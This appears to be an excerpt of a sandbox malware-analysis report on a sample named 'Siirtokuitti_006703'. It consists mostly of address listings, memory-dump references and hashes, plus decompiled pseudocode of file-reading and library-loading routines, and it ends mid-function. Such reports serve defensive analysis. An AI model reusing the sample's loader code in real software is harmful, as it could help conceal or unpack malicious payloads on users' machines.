                                                                                                                      0x00406ba6
                                                                                                                      0x00406bac
                                                                                                                      0x00406baf
                                                                                                                      0x00406bb2
                                                                                                                      0x00406bb5
                                                                                                                      0x00406bb8
                                                                                                                      0x00406bbb
                                                                                                                      0x00406bbe
                                                                                                                      0x00406bda
                                                                                                                      0x00406bdd
                                                                                                                      0x00406be0
                                                                                                                      0x00406be3
                                                                                                                      0x00406bea
                                                                                                                      0x00406bee
                                                                                                                      0x00406bf0
                                                                                                                      0x00406bf4
                                                                                                                      0x00406bc0
                                                                                                                      0x00406bc0
                                                                                                                      0x00406bc4
                                                                                                                      0x00406bcc
                                                                                                                      0x00406bd1
                                                                                                                      0x00406bd3
                                                                                                                      0x00406bd5
                                                                                                                      0x00406bd5
                                                                                                                      0x00406bf7
                                                                                                                      0x00406bfe
                                                                                                                      0x00406c01
                                                                                                                      0x00000000
                                                                                                                      0x00406c07
                                                                                                                      0x00000000
                                                                                                                      0x00406c07
                                                                                                                      0x00000000
                                                                                                                      0x00406c0c
                                                                                                                      0x00406c0c
                                                                                                                      0x00406c10
                                                                                                                      0x004072d0
                                                                                                                      0x00000000
                                                                                                                      0x004072d0
                                                                                                                      0x00406c16
                                                                                                                      0x00406c19
                                                                                                                      0x00406c1c
                                                                                                                      0x00406c20
                                                                                                                      0x00406c23
                                                                                                                      0x00406c29
                                                                                                                      0x00406c2b
                                                                                                                      0x00406c2b
                                                                                                                      0x00406c2b
                                                                                                                      0x00406c2e
                                                                                                                      0x00406c31
                                                                                                                      0x00406c31
                                                                                                                      0x00406c31
                                                                                                                      0x00406c37
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406c39
                                                                                                                      0x00406c3c
                                                                                                                      0x00406c3f
                                                                                                                      0x00406c42
                                                                                                                      0x00406c45
                                                                                                                      0x00406c48
                                                                                                                      0x00406c4b
                                                                                                                      0x00406c4e
                                                                                                                      0x00406c51
                                                                                                                      0x00406c54
                                                                                                                      0x00406c57
                                                                                                                      0x00406c6f
                                                                                                                      0x00406c72
                                                                                                                      0x00406c75
                                                                                                                      0x00406c78
                                                                                                                      0x00406c7b
                                                                                                                      0x00406c7f
                                                                                                                      0x00406c81
                                                                                                                      0x00406c59
                                                                                                                      0x00406c59
                                                                                                                      0x00406c61
                                                                                                                      0x00406c66
                                                                                                                      0x00406c68
                                                                                                                      0x00406c6a
                                                                                                                      0x00406c6a
                                                                                                                      0x00406c84
                                                                                                                      0x00406c8b
                                                                                                                      0x00406c8e
                                                                                                                      0x00000000
                                                                                                                      0x00406c90
                                                                                                                      0x00000000
                                                                                                                      0x00406c90
                                                                                                                      0x00406c8e
                                                                                                                      0x00406c95
                                                                                                                      0x00406c95
                                                                                                                      0x00406c95
                                                                                                                      0x00406c95
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406cd0
                                                                                                                      0x00406cd0
                                                                                                                      0x00406cd4
                                                                                                                      0x004072dc
                                                                                                                      0x00000000
                                                                                                                      0x004072dc
                                                                                                                      0x00406cda
                                                                                                                      0x00406cdd
                                                                                                                      0x00406ce0
                                                                                                                      0x00406ce4
                                                                                                                      0x00406ce7
                                                                                                                      0x00406ced
                                                                                                                      0x00406cef
                                                                                                                      0x00406cef
                                                                                                                      0x00406cef
                                                                                                                      0x00406cf2
                                                                                                                      0x00406cf5
                                                                                                                      0x00406cf5
                                                                                                                      0x00406cfb
                                                                                                                      0x00406c99
                                                                                                                      0x00406c99
                                                                                                                      0x00406c9c
                                                                                                                      0x00000000
                                                                                                                      0x00406c9c
                                                                                                                      0x00406cfd
                                                                                                                      0x00406cfd
                                                                                                                      0x00406d00
                                                                                                                      0x00406d03
                                                                                                                      0x00406d06
                                                                                                                      0x00406d09
                                                                                                                      0x00406d0c
                                                                                                                      0x00406d0f
                                                                                                                      0x00406d12
                                                                                                                      0x00406d15
                                                                                                                      0x00406d18
                                                                                                                      0x00406d1b
                                                                                                                      0x00406d33
                                                                                                                      0x00406d36
                                                                                                                      0x00406d39
                                                                                                                      0x00406d3c
                                                                                                                      0x00406d3f
                                                                                                                      0x00406d43
                                                                                                                      0x00406d45
                                                                                                                      0x00406d1d
                                                                                                                      0x00406d1d
                                                                                                                      0x00406d25
                                                                                                                      0x00406d2a
                                                                                                                      0x00406d2c
                                                                                                                      0x00406d2e
                                                                                                                      0x00406d2e
                                                                                                                      0x00406d48
                                                                                                                      0x00406d4f
                                                                                                                      0x00406d52
                                                                                                                      0x00000000
                                                                                                                      0x00406d54
                                                                                                                      0x00000000
                                                                                                                      0x00406d54
                                                                                                                      0x00000000
                                                                                                                      0x00406fe1
                                                                                                                      0x00406fe1
                                                                                                                      0x00406fe5
                                                                                                                      0x0040730c
                                                                                                                      0x00000000
                                                                                                                      0x0040730c
                                                                                                                      0x00406feb
                                                                                                                      0x00406fee
                                                                                                                      0x00406ff1
                                                                                                                      0x00406ff5
                                                                                                                      0x00406ff8
                                                                                                                      0x00406ffe
                                                                                                                      0x00407000
                                                                                                                      0x00407000
                                                                                                                      0x00407000
                                                                                                                      0x00407003
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406db1
                                                                                                                      0x00406db1
                                                                                                                      0x00406db4
                                                                                                                      0x00407126
                                                                                                                      0x00407126
                                                                                                                      0x00000000
                                                                                                                      0x00407126
                                                                                                                      0x00000000
                                                                                                                      0x004070f0
                                                                                                                      0x004070f4
                                                                                                                      0x00407116
                                                                                                                      0x00407119
                                                                                                                      0x00407123
                                                                                                                      0x00407126
                                                                                                                      0x00407126
                                                                                                                      0x00000000
                                                                                                                      0x00407126
                                                                                                                      0x00407126
                                                                                                                      0x004070f6
                                                                                                                      0x004070f9
                                                                                                                      0x004070fd
                                                                                                                      0x00407100
                                                                                                                      0x00407100
                                                                                                                      0x00407103
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004071ad
                                                                                                                      0x004071b1
                                                                                                                      0x004071cf
                                                                                                                      0x004071cf
                                                                                                                      0x004071cf
                                                                                                                      0x004071d6
                                                                                                                      0x004071dd
                                                                                                                      0x004071e4
                                                                                                                      0x004071e4
                                                                                                                      0x00000000
                                                                                                                      0x004071e4
                                                                                                                      0x004071b3
                                                                                                                      0x004071b6
                                                                                                                      0x004071b9
                                                                                                                      0x004071bc
                                                                                                                      0x004071c3
                                                                                                                      0x00407107
                                                                                                                      0x00407107
                                                                                                                      0x0040710a
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040729e
                                                                                                                      0x004072a1
                                                                                                                      0x004071a2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406ed8
                                                                                                                      0x00406eda
                                                                                                                      0x00406ee1
                                                                                                                      0x00406ee2
                                                                                                                      0x00406ee4
                                                                                                                      0x00406ee7
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406eef
                                                                                                                      0x00406ef2
                                                                                                                      0x00406ef5
                                                                                                                      0x00406ef7
                                                                                                                      0x00406ef9
                                                                                                                      0x00406ef9
                                                                                                                      0x00406efa
                                                                                                                      0x00406efd
                                                                                                                      0x00406f04
                                                                                                                      0x00406f07
                                                                                                                      0x00406f15
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004071eb
                                                                                                                      0x004071eb
                                                                                                                      0x004071ee
                                                                                                                      0x004071f5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004071fa
                                                                                                                      0x004071fa
                                                                                                                      0x004071fe
                                                                                                                      0x00407336
                                                                                                                      0x00000000
                                                                                                                      0x00407336
                                                                                                                      0x00407204
                                                                                                                      0x00407207
                                                                                                                      0x0040720a
                                                                                                                      0x0040720e
                                                                                                                      0x00407211
                                                                                                                      0x00407217
                                                                                                                      0x00407219
                                                                                                                      0x00407219
                                                                                                                      0x00407219
                                                                                                                      0x0040721c
                                                                                                                      0x0040721f
                                                                                                                      0x0040721f
                                                                                                                      0x0040721f
                                                                                                                      0x0040721f
                                                                                                                      0x00407222
                                                                                                                      0x00407222
                                                                                                                      0x00407226
                                                                                                                      0x00407286
                                                                                                                      0x00407289
                                                                                                                      0x0040728e
                                                                                                                      0x0040728f
                                                                                                                      0x00407291
                                                                                                                      0x00407293
                                                                                                                      0x00407296
                                                                                                                      0x004071a2
                                                                                                                      0x004071a2
                                                                                                                      0x00000000
                                                                                                                      0x004071a8
                                                                                                                      0x004071a2
                                                                                                                      0x00407228
                                                                                                                      0x0040722e
                                                                                                                      0x00407231
                                                                                                                      0x00407234
                                                                                                                      0x00407237
                                                                                                                      0x0040723a
                                                                                                                      0x0040723d
                                                                                                                      0x00407240
                                                                                                                      0x00407243
                                                                                                                      0x00407246
                                                                                                                      0x00407249
                                                                                                                      0x00407262
                                                                                                                      0x00407265
                                                                                                                      0x00407268
                                                                                                                      0x0040726b
                                                                                                                      0x0040726f
                                                                                                                      0x00407271
                                                                                                                      0x00407271
                                                                                                                      0x00407272
                                                                                                                      0x00407275
                                                                                                                      0x0040724b
                                                                                                                      0x0040724b
                                                                                                                      0x00407253
                                                                                                                      0x00407258
                                                                                                                      0x0040725a
                                                                                                                      0x0040725d
                                                                                                                      0x0040725d
                                                                                                                      0x00407278
                                                                                                                      0x0040727f
                                                                                                                      0x00000000
                                                                                                                      0x00407281
                                                                                                                      0x00000000
                                                                                                                      0x00407281
                                                                                                                      0x00000000
                                                                                                                      0x00406f1d
                                                                                                                      0x00406f20
                                                                                                                      0x00406f56
                                                                                                                      0x00407086
                                                                                                                      0x00407086
                                                                                                                      0x00407086
                                                                                                                      0x00407086
                                                                                                                      0x00407089
                                                                                                                      0x00407089
                                                                                                                      0x0040708c
                                                                                                                      0x0040708e
                                                                                                                      0x00407318
                                                                                                                      0x00000000
                                                                                                                      0x00407318
                                                                                                                      0x00407094
                                                                                                                      0x00407097
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040709d
                                                                                                                      0x004070a1
                                                                                                                      0x004070a4
                                                                                                                      0x004070a4
                                                                                                                      0x004070a4
                                                                                                                      0x00000000
                                                                                                                      0x004070a4
                                                                                                                      0x00406f22
                                                                                                                      0x00406f24
                                                                                                                      0x00406f26
                                                                                                                      0x00406f28
                                                                                                                      0x00406f2b
                                                                                                                      0x00406f2c
                                                                                                                      0x00406f2e
                                                                                                                      0x00406f30
                                                                                                                      0x00406f33
                                                                                                                      0x00406f36
                                                                                                                      0x00406f4c
                                                                                                                      0x00406f51
                                                                                                                      0x00406f89
                                                                                                                      0x00406f89
                                                                                                                      0x00406f8d
                                                                                                                      0x00406fb9
                                                                                                                      0x00406fbb
                                                                                                                      0x00406fc2
                                                                                                                      0x00406fc5
                                                                                                                      0x00406fc8
                                                                                                                      0x00406fc8
                                                                                                                      0x00406fcd
                                                                                                                      0x00406fcd
                                                                                                                      0x00406fcf
                                                                                                                      0x00406fd2
                                                                                                                      0x00406fd9
                                                                                                                      0x00406fdc
                                                                                                                      0x00407009
                                                                                                                      0x00407009
                                                                                                                      0x0040700c
                                                                                                                      0x0040700f
                                                                                                                      0x00407083
                                                                                                                      0x00407083
                                                                                                                      0x00407083
                                                                                                                      0x00000000
                                                                                                                      0x00407083
                                                                                                                      0x00407011
                                                                                                                      0x00407017
                                                                                                                      0x0040701a
                                                                                                                      0x0040701d
                                                                                                                      0x00407020
                                                                                                                      0x00407023
                                                                                                                      0x00407026
                                                                                                                      0x00407029
                                                                                                                      0x0040702c
                                                                                                                      0x0040702f
                                                                                                                      0x00407032
                                                                                                                      0x0040704b
                                                                                                                      0x0040704d
                                                                                                                      0x00407050
                                                                                                                      0x00407051
                                                                                                                      0x00407054
                                                                                                                      0x00407056
                                                                                                                      0x00407059
                                                                                                                      0x0040705b
                                                                                                                      0x0040705d
                                                                                                                      0x00407060
                                                                                                                      0x00407062
                                                                                                                      0x00407065
                                                                                                                      0x00407069
                                                                                                                      0x0040706b
                                                                                                                      0x0040706b
                                                                                                                      0x0040706c
                                                                                                                      0x0040706f
                                                                                                                      0x00407072
                                                                                                                      0x00407034
                                                                                                                      0x00407034
                                                                                                                      0x0040703c
                                                                                                                      0x00407041
                                                                                                                      0x00407043
                                                                                                                      0x00407046
                                                                                                                      0x00407046
                                                                                                                      0x00407075
                                                                                                                      0x0040707c
                                                                                                                      0x00407006
                                                                                                                      0x00407006
                                                                                                                      0x00407006
                                                                                                                      0x00407006
                                                                                                                      0x00000000
                                                                                                                      0x0040707e
                                                                                                                      0x00000000
                                                                                                                      0x0040707e
                                                                                                                      0x0040707c
                                                                                                                      0x00406f8f
                                                                                                                      0x00406f92
                                                                                                                      0x00406f94
                                                                                                                      0x00406f97
                                                                                                                      0x00406f9a
                                                                                                                      0x00406f9d
                                                                                                                      0x00406f9f
                                                                                                                      0x00406fa2
                                                                                                                      0x00406fa5
                                                                                                                      0x00406fa5
                                                                                                                      0x00406fa8
                                                                                                                      0x00406fa8
                                                                                                                      0x00406fab
                                                                                                                      0x00406fb2
                                                                                                                      0x00406f86
                                                                                                                      0x00406f86
                                                                                                                      0x00406f86
                                                                                                                      0x00406f86
                                                                                                                      0x00000000
                                                                                                                      0x00406fb4
                                                                                                                      0x00000000
                                                                                                                      0x00406fb4
                                                                                                                      0x00406fb2
                                                                                                                      0x00406f38
                                                                                                                      0x00406f3b
                                                                                                                      0x00406f3d
                                                                                                                      0x00406f40
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406c9f
                                                                                                                      0x00406c9f
                                                                                                                      0x00406ca3
                                                                                                                      0x004072e8
                                                                                                                      0x00000000
                                                                                                                      0x004072e8
                                                                                                                      0x00406ca9
                                                                                                                      0x00406cac
                                                                                                                      0x00406caf
                                                                                                                      0x00406cb2
                                                                                                                      0x00406cb5
                                                                                                                      0x00406cb8
                                                                                                                      0x00406cbb
                                                                                                                      0x00406cbd
                                                                                                                      0x00406cc0
                                                                                                                      0x00406cc3
                                                                                                                      0x00406cc6
                                                                                                                      0x00406cc8
                                                                                                                      0x00406cc8
                                                                                                                      0x00406cc8
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00406e2a
                                                                                                                      0x00406e2a
                                                                                                                      0x00406e2e
                                                                                                                      0x004072f4
                                                                                                                      0x00000000
                                                                                                                      0x004072f4
                                                                                                                      0x00406e34
                                                                                                                      0x00406e37
                                                                                                                      0x00406e3a
                                                                                                                      0x00406e3d
                                                                                                                      0x00406e3f
                                                                                                                      0x00406e3f
                                                                                                                      0x00406e3f
                                                                                                                      0x00406e42
                                                                                                                      0x00406e45
                                                                                                                      0x00406e48
                                                                                                                      0x00406e4b
                                                                                                                      0x00406e4e
                                                                                                                      0x00406e51
                                                                                                                      0x00406e52
                                                                                                                      0x00406e54
                                                                                                                      0x00406e54
                                                                                                                      0x00406e54
                                                                                                                      0x00406e57
                                                                                                                      0x00406e5a
                                                                                                                      0x00406e5d
                                                                                                                      0x00406e60
                                                                                                                      0x00406e60
                                                                                                                      0x00406e60
                                                                                                                      0x00406e63
                                                                                                                      0x00406e65
                                                                                                                      0x00406e65
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004070a7
                                                                                                                      0x004070a7
                                                                                                                      0x004070a7
                                                                                                                      0x004070ab
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004070b1
                                                                                                                      0x004070b4
                                                                                                                      0x004070b7
                                                                                                                      0x004070ba
                                                                                                                      0x004070bc
                                                                                                                      0x004070bc
                                                                                                                      0x004070bc
                                                                                                                      0x004070bf
                                                                                                                      0x004070c2
                                                                                                                      0x004070c5
                                                                                                                      0x004070c8
                                                                                                                      0x004070cb
                                                                                                                      0x004070ce
                                                                                                                      0x004070cf
                                                                                                                      0x004070d1
                                                                                                                      0x004070d1
                                                                                                                      0x004070d1
                                                                                                                      0x004070d4
                                                                                                                      0x004070d7
                                                                                                                      0x004070da
                                                                                                                      0x004070dd
                                                                                                                      0x004070e0
                                                                                                                      0x004070e4
                                                                                                                      0x004070e6
                                                                                                                      0x004070e9
                                                                                                                      0x00000000
                                                                                                                      0x004070eb
                                                                                                                      0x00406e68
                                                                                                                      0x00406e68
                                                                                                                      0x00000000
                                                                                                                      0x00406e68
                                                                                                                      0x004070e9
                                                                                                                      0x0040731e
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040694d
                                                                                                                      0x00407355
                                                                                                                      0x00407355
                                                                                                                      0x00000000
                                                                                                                      0x00407355
                                                                                                                      0x004071a2
                                                                                                                      0x00407129
                                                                                                                      0x00407126

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c741c7bc90f3712fe41ea972859e43f39dd565e03f7b0e7aa23f6ef9dcbd7f18
                                                                                                                      • Instruction ID: 737cb098acab11621bc79b115fd6dc57f162d32c21417d2b0fd17844244e9397
                                                                                                                      • Opcode Fuzzy Hash: c741c7bc90f3712fe41ea972859e43f39dd565e03f7b0e7aa23f6ef9dcbd7f18
                                                                                                                      • Instruction Fuzzy Hash: 5A714571E04228CFEF28CF98C8447ADBBB1FB44305F14806AD956BB281C778A996DF45
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E004032C2(intOrPtr _a4) {
                                                                                                                      				intOrPtr _t10;
                                                                                                                      				intOrPtr _t11;
                                                                                                                      				signed int _t12;
                                                                                                                      				void* _t14;
                                                                                                                      				void* _t15;
                                                                                                                      				long _t16;
                                                                                                                      				void* _t18;
                                                                                                                      				intOrPtr _t19;
                                                                                                                      				intOrPtr _t31;
                                                                                                                      				long _t32;
                                                                                                                      				intOrPtr _t34;
                                                                                                                      				intOrPtr _t36;
                                                                                                                      				void* _t37;
                                                                                                                      				intOrPtr _t49;
                                                                                                                      
                                                                                                                      				_t32 =  *0x418ed4; // 0x3efe
                                                                                                                      				_t34 = _t32 -  *0x40ce40 + _a4;
                                                                                                                      				 *0x42a250 = GetTickCount() + 0x1f4;
                                                                                                                      				if(_t34 <= 0) {
                                                                                                                      					L22:
                                                                                                                      					E00402E72("true");
                                                                                                                      					return 0;
                                                                                                                      				}
                                                                                                                      				E00403441( *0x418ee4);
                                                                                                                      				SetFilePointer( *0x40a01c,  *0x40ce40, 0, 0); // executed
                                                                                                                      				 *0x418ee0 = _t34;
                                                                                                                      				 *0x418ed0 = 0;
                                                                                                                      				while(1) {
                                                                                                                      					_t10 =  *0x418ed8; // 0x9bee7
                                                                                                                      					_t31 = 0x4000;
                                                                                                                      					_t11 = _t10 -  *0x418ee4;
                                                                                                                      					if(_t11 <= 0x4000) {
                                                                                                                      						_t31 = _t11;
                                                                                                                      					}
                                                                                                                      					_t12 = E0040342B(0x414ed0, _t31);
                                                                                                                      					if(_t12 == 0) {
                                                                                                                      						break;
                                                                                                                      					}
                                                                                                                      					 *0x418ee4 =  *0x418ee4 + _t31;
                                                                                                                      					 *0x40ce60 = 0x414ed0;
                                                                                                                      					 *0x40ce64 = _t31;
                                                                                                                      					L6:
                                                                                                                      					L6:
                                                                                                                      					if( *0x42a254 != 0 &&  *0x42a300 == 0) {
                                                                                                                      						_t19 =  *0x418ee0; // 0x325f
                                                                                                                      						 *0x418ed0 = _t19 -  *0x418ed4 - _a4 +  *0x40ce40;
                                                                                                                      						E00402E72(0);
                                                                                                                      					}
                                                                                                                      					 *0x40ce68 = 0x40ced0;
                                                                                                                      					 *0x40ce6c = 0x8000; // executed
                                                                                                                      					_t14 = E0040690B(0x40ce48); // executed
                                                                                                                      					if(_t14 < 0) {
                                                                                                                      						goto L20;
                                                                                                                      					}
                                                                                                                      					_t36 =  *0x40ce68; // 0x4102f7
                                                                                                                      					_t37 = _t36 - 0x40ced0;
                                                                                                                      					if(_t37 == 0) {
                                                                                                                      						__eflags =  *0x40ce64; // 0x0
                                                                                                                      						if(__eflags != 0) {
                                                                                                                      							goto L20;
                                                                                                                      						}
                                                                                                                      						__eflags = _t31;
                                                                                                                      						if(_t31 == 0) {
                                                                                                                      							goto L20;
                                                                                                                      						}
                                                                                                                      						L16:
                                                                                                                      						_t16 =  *0x418ed4; // 0x3efe
                                                                                                                      						if(_t16 -  *0x40ce40 + _a4 > 0) {
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                                                                                                                      						goto L22;
                                                                                                                      					}
                                                                                                                      					_t18 = E00405F54( *0x40a01c, 0x40ced0, _t37); // executed
                                                                                                                      					if(_t18 == 0) {
                                                                                                                      						_push(0xfffffffe);
                                                                                                                      						L21:
                                                                                                                      						_pop(_t15);
                                                                                                                      						return _t15;
                                                                                                                      					}
                                                                                                                      					 *0x40ce40 =  *0x40ce40 + _t37;
                                                                                                                      					_t49 =  *0x40ce64; // 0x0
                                                                                                                      					if(_t49 != 0) {
                                                                                                                      						goto L6;
                                                                                                                      					}
                                                                                                                      					goto L16;
                                                                                                                      					L20:
                                                                                                                      					_push(0xfffffffd);
                                                                                                                      					goto L21;
                                                                                                                      				}
                                                                                                                      				return _t12 | 0xffffffff;
                                                                                                                      			}

















                                                                                                                      0x004032c5
                                                                                                                      0x004032d2
                                                                                                                      0x004032e5
                                                                                                                      0x004032ea
                                                                                                                      0x0040341a
                                                                                                                      0x0040341c
                                                                                                                      0x00000000
                                                                                                                      0x00403422
                                                                                                                      0x004032f6
                                                                                                                      0x00403309
                                                                                                                      0x0040330f
                                                                                                                      0x00403315
                                                                                                                      0x00403320
                                                                                                                      0x00403320
                                                                                                                      0x00403325
                                                                                                                      0x0040332a
                                                                                                                      0x00403332
                                                                                                                      0x00403334
                                                                                                                      0x00403334
                                                                                                                      0x0040333d
                                                                                                                      0x00403344
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0040334a
                                                                                                                      0x00403350
                                                                                                                      0x00403356
                                                                                                                      0x00000000
                                                                                                                      0x0040335c
                                                                                                                      0x00403362
                                                                                                                      0x0040336c
                                                                                                                      0x00403382
                                                                                                                      0x00403387
                                                                                                                      0x0040338c
                                                                                                                      0x00403392
                                                                                                                      0x00403398
                                                                                                                      0x004033a2
                                                                                                                      0x004033a9
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004033ab
                                                                                                                      0x004033b1
                                                                                                                      0x004033b3
                                                                                                                      0x004033d6
                                                                                                                      0x004033dc
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004033de
                                                                                                                      0x004033e0
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004033e2
                                                                                                                      0x004033e2
                                                                                                                      0x004033f5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00403404
                                                                                                                      0x00000000
                                                                                                                      0x00403404
                                                                                                                      0x004033bd
                                                                                                                      0x004033c4
                                                                                                                      0x00403411
                                                                                                                      0x00403417
                                                                                                                      0x00403417
                                                                                                                      0x00000000
                                                                                                                      0x00403417
                                                                                                                      0x004033c6
                                                                                                                      0x004033cc
                                                                                                                      0x004033d2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00403415
                                                                                                                      0x00403415
                                                                                                                      0x00000000
                                                                                                                      0x00403415
                                                                                                                      0x00000000

                                                                                                                      APIs
                                                                                                                      • GetTickCount.KERNEL32 ref: 004032D6
                                                                                                                        • Part of subcall function 00403441: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313F,?), ref: 0040344F
                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031EC,00000004,00000000,00000000,?,?,00403166,000000FF,00000000,00000000,0040A230,?), ref: 00403309
                                                                                                                      • SetFilePointer.KERNELBASE(00003EFE,00000000,00000000,00414ED0,00004000,?,00000000,004031EC,00000004,00000000,00000000,?,?,00403166,000000FF,00000000), ref: 00403404
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000001.00000002.19308451510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000001.00000002.19308427177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308506113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308536845.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000001.00000002.19308853760.00000000004A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_1_2_400000_Siirtokuitti_006703.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FilePointer$CountTick
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1092082344-0
                                                                                                                      • Opcode ID: 63f894617870b8b9b6b4d0f35ad55c68ae2789ba15d09fbc75adc17a06edb544
                                                                                                                      • Instruction ID: 8a5bf560653b24f1bd3cd60389d49066fb51751ebaffca469d7b7cf87711dc5f
                                                                                                                      • Opcode Fuzzy Hash: 63f894617870b8b9b6b4d0f35ad55c68ae2789ba15d09fbc75adc17a06edb544
                                                                                                                      • Instruction Fuzzy Hash: 10316C72610211DBD711DF29EEC49A63BA9F78439A714823FE900B62E0CBB95D058B9D
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 60%
                                                                                                                      			E0040202C(void* __ebx, void* __eflags) {
                                                                                                                      				struct HINSTANCE__* _t23;
                                                                                                                      				struct HINSTANCE__* _t31;
                                                                                                                      				void* _t32;
                                                                                                                      				void* _t34;
                                                                                                                      				WCHAR* _t37;
                                                                                                                      				intOrPtr* _t38;
                                                                                                                      				void* _t39;
                                                                                                                      
                                                                                                                      				_t32 = __ebx;
                                                                                                                      				asm("sbb eax, 0x42a318");
                                                                                                                      				 *(_t39 - 4) = 1;
                                                                                                                      				if(__eflags < 0) {
                                                                                                                      					_push(0xffffffe7);
                                                                                                                      					L15:
                                                                                                                      					E00401423();
                                                                                                                      					L16:
                                                                                                                      					 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
                                                                                                                      					return 0;
                                                                                                                      				}
                                                                                                                      				_t37 = E00402C37(0xfffffff0);
                                                                                                                      				 *((intOrPtr*)(_t39 - 0x3c)) = E00402C37("true");
                                                                                                                      				if( *((intOrPtr*)(_t39 - 0x18)) == __ebx) {
                                                                                                                      					L3:
                                                                                                                      					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
                                                                                                                      					 *(_t39 + 8) = _t23;
                                                                                                                      					if(_t23 == _t32) {
                                                                                                                      						_push(0xfffffff6);
                                                                                                                      						goto L15;
                                                                                                                      					}
                                                                                                                      					L4:
                                                                                                                      					_t38 = E004067F9( *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x3c)));
                                                                                                                      					if(_t38 == _t32) {
